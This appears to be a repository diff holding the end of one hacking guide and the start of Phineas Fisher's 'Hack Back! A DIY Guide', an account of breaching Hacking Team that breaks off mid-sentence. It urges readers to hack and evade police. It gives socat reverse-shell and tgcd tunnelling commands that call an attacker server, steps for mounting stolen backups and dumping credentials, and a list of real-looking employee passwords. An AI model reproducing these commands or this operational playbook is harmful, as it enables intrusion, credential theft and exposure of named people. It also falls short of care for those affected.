||||
It was only after failing to fully hack Gamma and ending up with some
|
||||
interesting documents but no copy of the FinSpy server software that I had to
|
||||
make due with the far less lulzy backup plan of leaking their stuff while
|
||||
mocking them on twitter.
|
||||
Point your GPUs at FinSpy-PC+Mobile-2012-07-12-Final.zip and crack the password
|
||||
already so I can move on to step 2!
|
||||
|
||||
|
||||
--[ 8 ]-- Other Methods
|
||||
|
||||
The general method I outlined above of scan, find vulnerabilities, and exploit
|
||||
is just one way to hack, probably better suited to those with a background in
|
||||
programming. There's no one right way, and any method that works is as good as
|
||||
any other. The other main ways that I'll state without going into detail are:
|
||||
|
||||
1) Exploits in web browers, java, flash, or microsoft office, combined with
|
||||
emailing employees with a convincing message to get them to open the link or
|
||||
attachment, or hacking a web site frequented by the employees and adding the
|
||||
browser/java/flash exploit to that.
|
||||
This is the method used by most of the government hacking groups, but you don't
|
||||
need to be a government with millions to spend on 0day research or subscriptions
|
||||
to FinSploit or VUPEN to pull it off. You can get a quality russian exploit kit
|
||||
for a couple thousand, and rent access to one for much less. There's also
|
||||
metasploit browser autopwn, but you'll probably have better luck with no
|
||||
exploits and a fake flash updater prompt.
|
||||
|
||||
2) Taking advantage of the fact that people are nice, trusting, and helpful 95%
|
||||
of the time.
|
||||
The infosec industry invented a term to make this sound like some sort of
|
||||
science: "Social Engineering". This is probably the way to go if you don't know
|
||||
too much about computers, and it really is all it takes to be a successful
|
||||
hacker [0].
|
||||
|
||||
[0] https://www.youtube.com/watch?v=DB6ywr9fngU
|
||||
|
||||
|
||||
--[ 9 ]-- Resources
|
||||
|
||||
Links:
|
||||
|
||||
* https://www.pentesterlab.com/exercises/
|
||||
* http://overthewire.org/wargames/
|
||||
* http://www.hackthissite.org/
|
||||
* http://smashthestack.org/
|
||||
* http://www.win.tue.nl/~aeb/linux/hh/hh.html
|
||||
* http://www.phrack.com/
|
||||
* http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot
|
||||
* http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash
|
||||
* https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/
|
||||
* https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers
|
||||
(all his other blog posts are great too)
|
||||
* https://www.corelan.be/ (start at Exploit writing tutorial part 1)
|
||||
* http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/
|
||||
One trick it leaves out is that on most systems the apache access log is
|
||||
readable only by root, but you can still include from /proc/self/fd/10 or
|
||||
whatever fd apache opened it as. It would also be more useful if it mentioned
|
||||
what versions of php the various tricks were fixed in.
|
||||
* http://www.dest-unreach.org/socat/
|
||||
Get usable reverse shells with a statically linked copy of socat to drop on
|
||||
your target and:
|
||||
target$ socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp-listen:PORTNUM
|
||||
host$ socat file:`tty`,raw,echo=0 tcp-connect:localhost:PORTNUM
|
||||
It's also useful for setting up weird pivots and all kinds of other stuff.
|
||||
|
||||
Books:
|
||||
|
||||
* The Web Application Hacker's Handbook
|
||||
* Hacking: The Art of Exploitation
|
||||
* The Database Hacker's Handbook
|
||||
* The Art of Software Security Assessment
|
||||
* A Bug Hunter's Diary
|
||||
* Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier
|
||||
* TCP/IP Illustrated
|
||||
|
||||
Aside from the hacking specific stuff almost anything useful to a system
|
||||
administrator for setting up and administering networks will also be useful for
|
||||
exploring them. This includes familiarity with the windows command prompt and unix
|
||||
shell, basic scripting skills, knowledge of ldap, kerberos, active directory,
|
||||
networking, etc.
|
||||
|
||||
|
||||
--[ 10 ]-- Outro
|
||||
|
||||
You'll notice some of this sounds exactly like what Gamma is doing. Hacking is a
|
||||
tool. It's not selling hacking tools that makes Gamma evil. It's who their
|
||||
customers are targeting and with what purpose that makes them evil. That's not
|
||||
to say that tools are inherently neutral. Hacking is an offensive tool. In the
|
||||
same way that guerrilla warfare makes it harder to occupy a country, whenever
|
||||
it's cheaper to attack than to defend it's harder to maintain illegitimate
|
||||
authority and inequality. So I wrote this to try to make hacking easier and more
|
||||
accessible. And I wanted to show that the Gamma Group hack really was nothing
|
||||
fancy, just standard sqli, and that you do have the ability to go out and take
|
||||
similar action.
|
||||
|
||||
Solidarity to everyone in Gaza, Israeli conscientious-objectors, Chelsea
|
||||
Manning, Jeremy Hammond, Peter Sunde, anakata, and all other imprisoned
|
||||
hackers, dissidents, and criminals!
|
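Review bot: The closing sections of this file (Resources, Outro) carry no record of where the text was taken from, and the commit message ("1st import into tree") does not name a source either. For an archive of security texts, add the origin URL and a SHA-256 of the imported file to the commit message or to an index file in the tree, so a reader can check this copy against the original. The pastebin raw URL that 2.txt cites as "the last edition" may be that origin, but the import should state it rather than leave it to be inferred.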
925
PhineasFisher/2.txt
Executable file
|
@ -0,0 +1,925 @@
|
|||
_ _ _ ____ _ _
|
||||
| | | | __ _ ___| | __ | __ ) __ _ ___| | _| |
|
||||
| |_| |/ _` |/ __| |/ / | _ \ / _` |/ __| |/ / |
|
||||
| _ | (_| | (__| < | |_) | (_| | (__| <|_|
|
||||
|_| |_|\__,_|\___|_|\_\ |____/ \__,_|\___|_|\_(_)
|
||||
|
||||
A DIY Guide
|
||||
|
||||
|
||||
|
||||
,-._,-._
|
||||
_,-\ o O_/;
|
||||
/ , ` `|
|
||||
| \-.,___, / `
|
||||
\ `-.__/ / ,.\
|
||||
/ `-.__.-\` ./ \'
|
||||
/ /| ___\ ,/ `\
|
||||
( ( |.-"` '/\ \ `
|
||||
\ \/ ,, | \ _
|
||||
\| o/o / \.
|
||||
\ , / /
|
||||
( __`;-;'__`) \\
|
||||
`//'` `||` `\
|
||||
_// || __ _ _ _____ __
|
||||
.-"-._,(__) .(__).-""-. | | | | |_ _| |
|
||||
/ \ / \ | | |_| | | | |
|
||||
\ / \ / | | _ | | | |
|
||||
`'-------` `--------'` __| |_| |_| |_| |__
|
||||
#antisec
|
||||
|
||||
|
||||
|
||||
--[ 1 - Introduction ]----------------------------------------------------------
|
||||
|
||||
You'll notice the change in language since the last edition [1]. The
|
||||
English-speaking world already has tons of books, talks, guides, and
|
||||
info about hacking. In that world, there's plenty of hackers better than me,
|
||||
but they misuse their talents working for "defense" contractors, for intelligence
|
||||
agencies, to protect banks and corporations, and to defend the status quo.
|
||||
Hacker culture was born in the US as a counterculture, but that origin only
|
||||
remains in its aesthetics - the rest has been assimilated. At least they can
|
||||
wear a t-shirt, dye their hair blue, use their hacker names, and feel like
|
||||
rebels while they work for the Man.
|
||||
|
||||
You used to have to sneak into offices to leak documents [2]. You used to need
|
||||
a gun to rob a bank. Now you can do both from bed with a laptop in hand [3][4].
|
||||
Like the CNT said after the Gamma Group hack: "Let's take a step forward with
|
||||
new forms of struggle" [5]. Hacking is a powerful tool, let's learn and fight!
|
||||
|
||||
[1] http://pastebin.com/raw.php?i=cRYvK4jb
|
||||
[2] https://en.wikipedia.org/wiki/Citizens%27_Commission_to_Investigate_the_FBI
|
||||
[3] http://www.aljazeera.com/news/2015/09/algerian-hacker-hero-hoodlum-150921083914167.html
|
||||
[4] https://securelist.com/files/2015/02/Carbanak_APT_eng.pdf
|
||||
[5] http://madrid.cnt.es/noticia/consideraciones-sobre-el-ataque-informatico-a-gamma-group
|
||||
|
||||
|
||||
--[ 2 - Hacking Team ]----------------------------------------------------------
|
||||
|
||||
Hacking Team was a company that helped governments hack and spy on
|
||||
journalists, activists, political opposition, and other threats to their power
|
||||
[1][2][3][4][5][6][7][8][9][10][11]. And, occasionally, on actual criminals
|
||||
and terrorists [12]. Vincenzetti, the CEO, liked to end his emails with the
|
||||
fascist slogan "boia chi molla". It'd be more correct to say "boia chi vende
|
||||
RCS". They also claimed to have technology to solve the "problem" posed by Tor
|
||||
and the darknet [13]. But seeing as I'm still free, I have my doubts about
|
||||
its effectiveness.
|
||||
|
||||
[1] http://www.animalpolitico.com/2015/07/el-gobierno-de-puebla-uso-el-software-de-hacking-team-para-espionaje-politico/
|
||||
[2] http://www.prensa.com/politica/claves-entender-Hacking-Team-Panama_0_4251324994.html
|
||||
[3] http://www.24-horas.mx/ecuador-espio-con-hacking-team-a-opositor-carlos-figueroa/
|
||||
[4] https://citizenlab.org/2012/10/backdoors-are-forever-hacking-team-and-the-targeting-of-dissent/
|
||||
[5] https://citizenlab.org/2014/02/hacking-team-targeting-ethiopian-journalists/
|
||||
[6] https://citizenlab.org/2015/03/hacking-team-reloaded-us-based-ethiopian-journalists-targeted-spyware/
|
||||
[7] http://focusecuador.net/2015/07/08/hacking-team-rodas-paez-tiban-torres-son-espiados-en-ecuador/
|
||||
[8] http://www.pri.org/stories/2015-07-08/these-ethiopian-journalists-exile-hacking-team-revelations-are-personal
|
||||
[9] https://theintercept.com/2015/07/07/leaked-documents-confirm-hacking-team-sells-spyware-repressive-countries/
|
||||
[10] http://www.wired.com/2013/06/spy-tool-sold-to-governments/
|
||||
[11] http://www.theregister.co.uk/2015/07/13/hacking_team_vietnam_apt/
|
||||
[12] http://www.ilmessaggero.it/primopiano/cronaca/yara_bossetti_hacking_team-1588888.html
|
||||
[13] http://motherboard.vice.com/en_ca/read/hacking-team-founder-hey-fbi-we-can-help-you-crack-the-dark-web
|
||||
|
||||
|
||||
--[ 3 - Stay safe out there ]---------------------------------------------------
|
||||
|
||||
Unfortunately, our world is backwards. You get rich by doing bad things and go
|
||||
to jail for doing good. Fortunately, thanks to the hard work of people like
|
||||
the Tor project [1], you can avoid going to jail by taking a few simple
|
||||
precautions:
|
||||
|
||||
1) Encrypt your hard disk [2]
|
||||
|
||||
I guess when the police arrive to seize your computer, it means you've
|
||||
already made a lot of mistakes, but it's better to be safe.
|
||||
|
||||
2) Use a virtual machine with all traffic routed through Tor
|
||||
|
||||
This accomplishes two things. First, all your traffic is anonymized through
|
||||
Tor. Second, keeping your personal life and your hacking on separate
|
||||
computers helps you not to mix them by accident.
|
||||
|
||||
You can use projects like Whonix [3], Tails [4], Qubes TorVM [5], or
|
||||
something custom [6]. Here's [7] a detailed comparison.
|
||||
|
||||
3) (Optional) Don't connect directly to Tor
|
||||
|
||||
Tor isn't a panacea. They can correlate the times you're connected to Tor
|
||||
with the times your hacker handle is active. Also, there have been
|
||||
successful attacks against Tor [8]. You can connect to Tor using other
|
||||
peoples' wifi. Wifislax [9] is a linux distro with a lot of tools for
|
||||
cracking wifi. Another option is to connect to a VPN or a bridge node [10]
|
||||
before Tor, but that's less secure because they can still correlate the
|
||||
hacker's activity with your house's internet activity (this was used as
|
||||
evidence against Jeremy Hammond [11]).
|
||||
|
||||
The reality is that while Tor isn't perfect, it works quite well. When I
|
||||
was young and reckless, I did plenty of stuff without any protection (I'm
|
||||
referring to hacking) apart from Tor, that the police tried their hardest
|
||||
to investigate, and I've never had any problems.
|
||||
|
||||
[1] https://www.torproject.org/
|
||||
[2] https://info.securityinabox.org/es/chapter-4
|
||||
[3] https://www.whonix.org/
|
||||
[4] https://tails.boum.org/
|
||||
[5] https://www.qubes-os.org/doc/privacy/torvm/
|
||||
[6] https://trac.torproject.org/projects/tor/wiki/doc/TransparentProxy
|
||||
[7] https://www.whonix.org/wiki/Comparison_with_Others
|
||||
[8] https://blog.torproject.org/blog/tor-security-advisory-relay-early-traffic-confirmation-attack/
|
||||
[9] http://www.wifislax.com/
|
||||
[10] https://www.torproject.org/docs/bridges.html.en
|
||||
[11] http://www.documentcloud.org/documents/1342115-timeline-correlation-jeremy-hammond-and-anarchaos.html
|
||||
|
||||
|
||||
----[ 3.1 - Infrastructure ]----------------------------------------------------
|
||||
|
||||
I don't hack directly from Tor exit nodes. They're on blacklists, they're
|
||||
slow, and they can't receive connect-backs. Tor protects my anonymity while I
|
||||
connect to the infrastructure I use to hack, which consists of:
|
||||
|
||||
1) Domain Names
|
||||
|
||||
For C&C addresses, and for DNS tunnels for guaranteed egress.
|
||||
|
||||
2) Stable Servers
|
||||
|
||||
For use as C&C servers, to receive connect-back shells, to launch attacks,
|
||||
and to store the loot.
|
||||
|
||||
3) Hacked Servers
|
||||
|
||||
For use as pivots to hide the IP addresses of the stable servers. And for
|
||||
when I want a fast connection without pivoting, for example to scan ports,
|
||||
scan the whole internet, download a database with sqli, etc.
|
||||
|
||||
Obviously, you have to use an anonymous payment method, like bitcoin (if it's
|
||||
used carefully).
|
||||
|
||||
|
||||
----[ 3.2 - Attribution ]-------------------------------------------------------
|
||||
|
||||
In the news we often see attacks traced back to government-backed hacking
|
||||
groups ("APTs"), because they repeatedly use the same tools, leave the same
|
||||
footprints, and even use the same infrastructure (domains, emails, etc).
|
||||
They're negligent because they can hack without legal consequences.
|
||||
|
||||
I didn't want to make the police's work any easier by relating my hack of
|
||||
Hacking Team with other hacks I've done or with names I use in my day-to-day
|
||||
work as a blackhat hacker. So, I used new servers and domain names, registered
|
||||
with new emails, and payed for with new bitcoin addresses. Also, I only used
|
||||
tools that are publicly available, or things that I wrote specifically for
|
||||
this attack, and I changed my way of doing some things to not leave my usual
|
||||
forensic footprint.
|
||||
|
||||
|
||||
--[ 4 - Information Gathering ]-------------------------------------------------
|
||||
|
||||
Although it can be tedious, this stage is very important, since the larger the
|
||||
attack surface, the easier it is to find a hole somewhere in it.
|
||||
|
||||
|
||||
----[ 4.1 - Technical Information ]---------------------------------------------
|
||||
|
||||
Some tools and techniques are:
|
||||
|
||||
1) Google
|
||||
|
||||
A lot of interesting things can be found with a few well-chosen search
|
||||
queries. For example, the identity of DPR [1]. The bible of Google hacking
|
||||
is the book "Google Hacking for Penetration Testers". You can find a short
|
||||
summary in Spanish at [2].
|
||||
|
||||
2) Subdomain Enumeration
|
||||
|
||||
Often, a company's main website is hosted by a third party, and you'll find
|
||||
the company's actual IP range thanks to subdomains like mx.company.com or
|
||||
ns1.company.com. Also, sometimes there are things that shouldn't be exposed
|
||||
in "hidden" subdomains. Useful tools for discovering domains and subdomains
|
||||
are fierce [3], theHarvester [4], and recon-ng [5].
|
||||
|
||||
3) Whois lookups and reverse lookups
|
||||
|
||||
With a reverse lookup using the whois information from a domain or IP range
|
||||
of a company, you can find other domains and IP ranges. As far as I know,
|
||||
there's no free way to do reverse lookups aside from a google "hack":
|
||||
|
||||
"via della moscova 13" site:www.findip-address.com
|
||||
"via della moscova 13" site:domaintools.com
|
||||
|
||||
4) Port scanning and fingerprinting
|
||||
|
||||
Unlike the other techniques, this talks to the company's servers. I
|
||||
include it in this section because it's not an attack, it's just
|
||||
information gathering. The company's IDS might generate an alert, but you
|
||||
don't have to worry since the whole internet is being scanned constantly.
|
||||
|
||||
For scanning, nmap [6] is precise, and can fingerprint the majority of
|
||||
services discovered. For companies with very large IP ranges, zmap [7] or
|
||||
masscan [8] are fast. WhatWeb [9] or BlindElephant [10] can fingerprint web
|
||||
sites.
|
||||
|
||||
[1] http://www.nytimes.com/2015/12/27/business/dealbook/the-unsung-tax-agent-who-put-a-face-on-the-silk-road.html
|
||||
[2] http://web.archive.org/web/20140610083726/http://www.soulblack.com.ar/repo/papers/hackeando_con_google.pdf
|
||||
[3] http://ha.ckers.org/fierce/
|
||||
[4] https://github.com/laramies/theHarvester
|
||||
[5] https://bitbucket.org/LaNMaSteR53/recon-ng
|
||||
[6] https://nmap.org/
|
||||
[7] https://zmap.io/
|
||||
[8] https://github.com/robertdavidgraham/masscan
|
||||
[9] http://www.morningstarsecurity.com/research/whatweb
|
||||
[10] http://blindelephant.sourceforge.net/
|
||||
|
||||
|
||||
----[ 4.2 - Social Information ]------------------------------------------------
|
||||
|
||||
For social engineering, it's useful to have information about the employees,
|
||||
their roles, contact information, operating system, browser, plugins,
|
||||
software, etc. Some resources are:
|
||||
|
||||
1) Google
|
||||
|
||||
Here as well, it's the most useful tool.
|
||||
|
||||
2) theHarvester and recon-ng
|
||||
|
||||
I already mentioned them in the previous section, but they have a lot more
|
||||
functionality. They can find a lot of information quickly and
|
||||
automatically. It's worth reading all their documentation.
|
||||
|
||||
3) LinkedIn
|
||||
|
||||
A lot of information about the employees can be found here. The company's
|
||||
recruiters are the most likely to accept your connection requests.
|
||||
|
||||
4) Data.com
|
||||
|
||||
Previously known as jigsaw. They have contact information for many
|
||||
employees.
|
||||
|
||||
5) File Metadata
|
||||
|
||||
A lot of information about employees and their systems can be found in
|
||||
metadata of files the company has published. Useful tools for finding
|
||||
files on the company's website and extracting the metadata are metagoofil
|
||||
[1] and FOCA [2].
|
||||
|
||||
[1] https://github.com/laramies/metagoofil
|
||||
[2] https://www.elevenpaths.com/es/labstools/foca-2/index.html
|
||||
|
||||
|
||||
--[ 5 - Entering the network ]--------------------------------------------------
|
||||
|
||||
There are various ways to get a foothold. Since the method I used against
|
||||
Hacking Team is uncommon and a lot more work than is usually necessary, I'll
|
||||
talk a little about the two most common ways, which I recommend trying first.
|
||||
|
||||
|
||||
----[ 5.1 - Social Engineering ]------------------------------------------------
|
||||
|
||||
Social engineering, specifically spear phishing, is responsible for the
|
||||
majority of hacks these days. For an introduction in Spanish, see [1]. For
|
||||
more information in English, see [2] (the third part, "Targeted Attacks"). For
|
||||
fun stories about the social engineering exploits of past generations, see
|
||||
[3]. I didn't want to try to spear phish Hacking Team, as their whole business
|
||||
is helping governments spear phish their opponents, so they'd be much more
|
||||
likely to recognize and investigate a spear phishing attempt.
|
||||
|
||||
[1] http://www.hacknbytes.com/2016/01/apt-pentest-con-empire.html
|
||||
[2] http://blog.cobaltstrike.com/2015/09/30/advanced-threat-tactics-course-and-notes/
|
||||
[3] http://www.netcomunity.com/lestertheteacher/doc/ingsocial1.pdf
|
||||
|
||||
|
||||
----[ 5.2 - Buying Access ]-----------------------------------------------------
|
||||
|
||||
Thanks to hardworking Russians and their exploit kits, traffic sellers, and
|
||||
bot herders, many companies already have compromised computers in their
|
||||
networks. Almost all of the Fortune 500, with their huge networks, have some
|
||||
bots already inside. However, Hacking Team is a very small company, and most
|
||||
of it's employees are infosec experts, so there was a low chance that they'd
|
||||
already been compromised.
|
||||
|
||||
|
||||
----[ 5.3 - Technical Exploitation ]--------------------------------------------
|
||||
|
||||
After the Gamma Group hack, I described a process for searching for
|
||||
vulnerabilities [1]. Hacking Team had one public IP range:
|
||||
inetnum: 93.62.139.32 - 93.62.139.47
|
||||
descr: HT public subnet
|
||||
|
||||
Hacking Team had very little exposed to the internet. For example, unlike
|
||||
Gamma Group, their customer support site needed a client certificate to
|
||||
connect. What they had was their main website (a Joomla blog in which Joomscan
|
||||
[2] didn't find anything serious), a mail server, a couple routers, two VPN
|
||||
appliances, and a spam filtering appliance. So, I had three options: look for
|
||||
a 0day in Joomla, look for a 0day in postfix, or look for a 0day in one of the
|
||||
embedded devices. A 0day in an embedded device seemed like the easiest option,
|
||||
and after two weeks of work reverse engineering, I got a remote root exploit.
|
||||
Since the vulnerabilities still haven't been patched, I won't give more
|
||||
details, but for more information on finding these kinds of vulnerabilities,
|
||||
see [3] and [4].
|
||||
|
||||
[1] http://pastebin.com/raw.php?i=cRYvK4jb
|
||||
[2] http://sourceforge.net/projects/joomscan/
|
||||
[3] http://www.devttys0.com/
|
||||
[4] https://docs.google.com/presentation/d/1-mtBSka1ktdh8RHxo2Ft0oNNlIp7WmDA2z9zzHpon8A
|
||||
|
||||
|
||||
--[ 6 - Be Prepared ]-----------------------------------------------------------
|
||||
|
||||
I did a lot of work and testing before using the exploit against Hacking Team.
|
||||
I wrote a backdoored firmware, and compiled various post-exploitation tools
|
||||
for the embedded device. The backdoor serves to protect the exploit. Using the
|
||||
exploit just once and then returning through the backdoor makes it harder to
|
||||
identify and patch the vulnerabilities.
|
||||
|
||||
The post-exploitation tools that I'd prepared were:
|
||||
|
||||
1) busybox
|
||||
|
||||
For all the standard Unix utilities that the system didn't have.
|
||||
|
||||
2) nmap
|
||||
|
||||
To scan and fingerprint Hacking Team's internal network.
|
||||
|
||||
3) Responder.py
|
||||
|
||||
The most useful tool for attacking windows networks when you have access to
|
||||
the internal network, but no domain user.
|
||||
|
||||
4) Python
|
||||
|
||||
To execute Responder.py
|
||||
|
||||
5) tcpdump
|
||||
|
||||
For sniffing traffic.
|
||||
|
||||
6) dsniff
|
||||
|
||||
For sniffing passwords from plaintext protocols like ftp, and for
|
||||
arpspoofing. I wanted to use ettercap, written by Hacking Team's own ALoR
|
||||
and NaGA, but it was hard to compile it for the system.
|
||||
|
||||
7) socat
|
||||
|
||||
For a comfortable shell with a pty:
|
||||
my_server: socat file:`tty`,raw,echo=0 tcp-listen:my_port
|
||||
hacked box: socat exec:'bash -li',pty,stderr,setsid,sigint,sane \
|
||||
tcp:my_server:my_port
|
||||
|
||||
And useful for a lot more, it's a networking swiss army knife. See the
|
||||
examples section of its documentation.
|
||||
|
||||
8) screen
|
||||
|
||||
Like the shell with pty, it wasn't really necessary, but I wanted to feel
|
||||
at home in Hacking Team's network.
|
||||
|
||||
9) a SOCKS proxy server
|
||||
|
||||
To use with proxychains to be able to access their local network from any
|
||||
program.
|
||||
|
||||
10) tgcd
|
||||
|
||||
For forwarding ports, like for the SOCKS server, through the firewall.
|
||||
|
||||
[1] https://www.busybox.net/
|
||||
[2] https://nmap.org/
|
||||
[3] https://github.com/SpiderLabs/Responder
|
||||
[4] https://github.com/bendmorris/static-python
|
||||
[5] http://www.tcpdump.org/
|
||||
[6] http://www.monkey.org/~dugsong/dsniff/
|
||||
[7] http://www.dest-unreach.org/socat/
|
||||
[8] https://www.gnu.org/software/screen/
|
||||
[9] http://average-coder.blogspot.com/2011/09/simple-socks5-server-in-c.html
|
||||
[10] http://tgcd.sourceforge.net/
|
||||
|
||||
|
||||
The worst thing that could happen would be for my backdoor or post-exploitation
|
||||
tools to make the system unstable and cause an employee to investigate. So I
|
||||
spent a week testing my exploit, backdoor, and post-exploitation tools in the
|
||||
networks of other vulnerable companies before entering Hacking Team's network.
|
||||
|
||||
|
||||
--[ 7 - Watch and Listen ]------------------------------------------------------
|
||||
|
||||
Now inside their internal network, I wanted to take a look around and think
|
||||
about my next step. I started Responder.py in analysis mode (-A to listen
|
||||
without sending poisoned responses), and did a slow scan with nmap.
|
||||
|
||||
|
||||
--[ 8 - NoSQL Databases ]-------------------------------------------------------
|
||||
|
||||
NoSQL, or rather NoAuthentication, has been a huge gift to the hacker
|
||||
community [1]. Just when I was worried that they'd finally patched all of the
|
||||
authentication bypass bugs in MySQL [2][3][4][5], new databases came into
|
||||
style that lack authentication by design. Nmap found a few in Hacking Team's
|
||||
internal network:
|
||||
|
||||
27017/tcp open mongodb MongoDB 2.6.5
|
||||
| mongodb-databases:
|
||||
| ok = 1
|
||||
| totalSizeMb = 47547
|
||||
| totalSize = 49856643072
|
||||
...
|
||||
|_ version = 2.6.5
|
||||
|
||||
27017/tcp open mongodb MongoDB 2.6.5
|
||||
| mongodb-databases:
|
||||
| ok = 1
|
||||
| totalSizeMb = 31987
|
||||
| totalSize = 33540800512
|
||||
| databases
|
||||
...
|
||||
|_ version = 2.6.5
|
||||
|
||||
They were the databases for test instances of RCS. The audio that RCS records
|
||||
is stored in MongoDB with GridFS. The audio folder in the torrent [6] came
|
||||
from this. They were spying on themselves without meaning to.
|
||||
|
||||
[1] https://www.shodan.io/search?query=product%3Amongodb
|
||||
[2] https://community.rapid7.com/community/metasploit/blog/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql
|
||||
[3] http://archives.neohapsis.com/archives/vulnwatch/2004-q3/0001.html
|
||||
[4] http://downloads.securityfocus.com/vulnerabilities/exploits/hoagie_mysql.c
|
||||
[5] http://archives.neohapsis.com/archives/bugtraq/2000-02/0053.html
|
||||
[6] https://ht.transparencytoolkit.org/audio/
|
||||
|
||||
|
||||
--[ 9 - Crossed Cables ]--------------------------------------------------------
|
||||
|
||||
Although it was fun to listen to recordings and see webcam images of Hacking
|
||||
Team developing their malware, it wasn't very useful. Their insecure backups
|
||||
were the vulnerability that opened their doors. According to their
|
||||
documentation [1], their iSCSI devices were supposed to be on a separate
|
||||
network, but nmap found a few in their subnetwork 192.168.1.200/24:
|
||||
|
||||
Nmap scan report for ht-synology.hackingteam.local (192.168.200.66)
|
||||
...
|
||||
3260/tcp open iscsi?
|
||||
| iscsi-info:
|
||||
| Target: iqn.2000-01.com.synology:ht-synology.name
|
||||
| Address: 192.168.200.66:3260,0
|
||||
|_ Authentication: No authentication required
|
||||
|
||||
Nmap scan report for synology-backup.hackingteam.local (192.168.200.72)
|
||||
...
|
||||
3260/tcp open iscsi?
|
||||
| iscsi-info:
|
||||
| Target: iqn.2000-01.com.synology:synology-backup.name
|
||||
| Address: 10.0.1.72:3260,0
|
||||
| Address: 192.168.200.72:3260,0
|
||||
|_ Authentication: No authentication required
|
||||
|
||||
iSCSI needs a kernel module, and it would've been difficult to compile it for
|
||||
the embedded system. I forwarded the port so that I could mount it from a VPS:
|
||||
|
||||
VPS: tgcd -L -p 3260 -q 42838
|
||||
Embedded system: tgcd -C -s 192.168.200.72:3260 -c VPS_IP:42838
|
||||
|
||||
VPS: iscsiadm -m discovery -t sendtargets -p 127.0.0.1
|
||||
|
||||
Now iSCSI finds the name iqn.2000-01.com.synology but has problems mounting it
|
||||
because it thinks its IP is 192.168.200.72 instead of 127.0.0.1
|
||||
|
||||
The way I solved it was:
|
||||
iptables -t nat -A OUTPUT -d 192.168.200.72 -j DNAT --to-destination 127.0.0.1
|
||||
|
||||
And now, after:
|
||||
iscsiadm -m node --targetname=iqn.2000-01.com.synology:synology-backup.name -p 192.168.200.72 --login
|
||||
|
||||
...the device file appears! We mount it:
|
||||
vmfs-fuse -o ro /dev/sdb1 /mnt/tmp
|
||||
|
||||
and find backups of various virtual machines. The Exchange server seemed like
|
||||
the most interesting. It was too big too download, but it was possible to
|
||||
mount it remotely to look for interesting files:
|
||||
$ losetup /dev/loop0 Exchange.hackingteam.com-flat.vmdk
|
||||
$ fdisk -l /dev/loop0
|
||||
/dev/loop0p1 2048 1258287103 629142528 7 HPFS/NTFS/exFAT
|
||||
|
||||
so the offset is 2048 * 512 = 1048576
|
||||
$ losetup -o 1048576 /dev/loop1 /dev/loop0
|
||||
$ mount -o ro /dev/loop1 /mnt/exchange/
|
||||
|
||||
now in /mnt/exchange/WindowsImageBackup/EXCHANGE/Backup 2014-10-14 172311
|
||||
we find the hard disk of the VM, and mount it:
|
||||
vdfuse -r -t VHD -f f0f78089-d28a-11e2-a92c-005056996a44.vhd /mnt/vhd-disk/
|
||||
mount -o loop /mnt/vhd-disk/Partition1 /mnt/part1
|
||||
|
||||
...and finally we've unpacked the Russian doll and can see all the files from
|
||||
the old Exchange server in /mnt/part1
|
||||
|
||||
[1] https://ht.transparencytoolkit.org/FileServer/FileServer/Hackingteam/InfrastrutturaIT/Rete/infrastruttura%20ht.pdf
|
||||
|
||||
|
||||
--[ 10 - From backups to domain admin ]-----------------------------------------
|
||||
|
||||
What interested me most in the backup was seeing if it had a password or hash
|
||||
that could be used to access the live server. I used pwdump, cachedump, and
|
||||
lsadump [1] on the registry hives. lsadump found the password to the besadmin
|
||||
service account:
|
||||
|
||||
_SC_BlackBerry MDS Connection Service
|
||||
0000 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
|
||||
0010 62 00 65 00 73 00 33 00 32 00 36 00 37 00 38 00 b.e.s.3.2.6.7.8.
|
||||
0020 21 00 21 00 21 00 00 00 00 00 00 00 00 00 00 00 !.!.!...........
|
||||
|
||||
I used proxychains [2] with the socks server on the embedded device and
|
||||
smbclient [3] to check the password:
|
||||
proxychains smbclient '//192.168.100.51/c$' -U 'hackingteam.local/besadmin%bes32678!!!'
|
||||
|
||||
It worked! The password for besadmin was still valid, and a local admin. I
|
||||
used my proxy and metasploit's psexec_psh [4] to get a meterpreter session.
|
||||
Then I migrated to a 64 bit process, ran "load kiwi" [5], "creds_wdigest", and
|
||||
got a bunch of passwords, including the Domain Admin:
|
||||
|
||||
HACKINGTEAM BESAdmin bes32678!!!
|
||||
HACKINGTEAM Administrator uu8dd8ndd12!
|
||||
HACKINGTEAM c.pozzi P4ssword <---- lol great sysadmin
|
||||
HACKINGTEAM m.romeo ioLK/(90
|
||||
HACKINGTEAM l.guerra 4luc@=.=
|
||||
HACKINGTEAM d.martinez W4tudul3sp
|
||||
HACKINGTEAM g.russo GCBr0s0705!
|
||||
HACKINGTEAM a.scarafile Cd4432996111
|
||||
HACKINGTEAM r.viscardi Ht2015!
|
||||
HACKINGTEAM a.mino A!e$$andra
|
||||
HACKINGTEAM m.bettini Ettore&Bella0314
|
||||
HACKINGTEAM m.luppi Blackou7
|
||||
HACKINGTEAM s.gallucci 1S9i8m4o!
|
||||
HACKINGTEAM d.milan set!dob66
|
||||
HACKINGTEAM w.furlan Blu3.B3rry!
|
||||
HACKINGTEAM d.romualdi Rd13136f@#
|
||||
HACKINGTEAM l.invernizzi L0r3nz0123!
|
||||
HACKINGTEAM e.ciceri 2O2571&2E
|
||||
HACKINGTEAM e.rabe erab@4HT!
|
||||
|
||||
[1] https://github.com/Neohapsis/creddump7
|
||||
[2] http://proxychains.sourceforge.net/
|
||||
[3] https://www.samba.org/
|
||||
[4] http://ns2.elhacker.net/timofonica/manuales/Manual_de_Metasploit_Unleashed.pdf
|
||||
[5] https://github.com/gentilkiwi/mimikatz
|
||||
|
||||
|
||||
--[ 11 - Downloading the mail ]-------------------------------------------------
|
||||
|
||||
With the Domain Admin password, I have access to the email, the heart of the
|
||||
company. Since with each step I take there's a chance of being detected, I
|
||||
start downloading their email before continuing to explore. Powershell makes
|
||||
it easy [1]. Curiously, I found a bug with Powershell's date handling. After
|
||||
downloading the emails, it took me another couple weeks to get access to the
|
||||
source code and everything else, so I returned every now and then to download
|
||||
the new emails. The server was Italian, with dates in the format
|
||||
day/month/year. I used:
|
||||
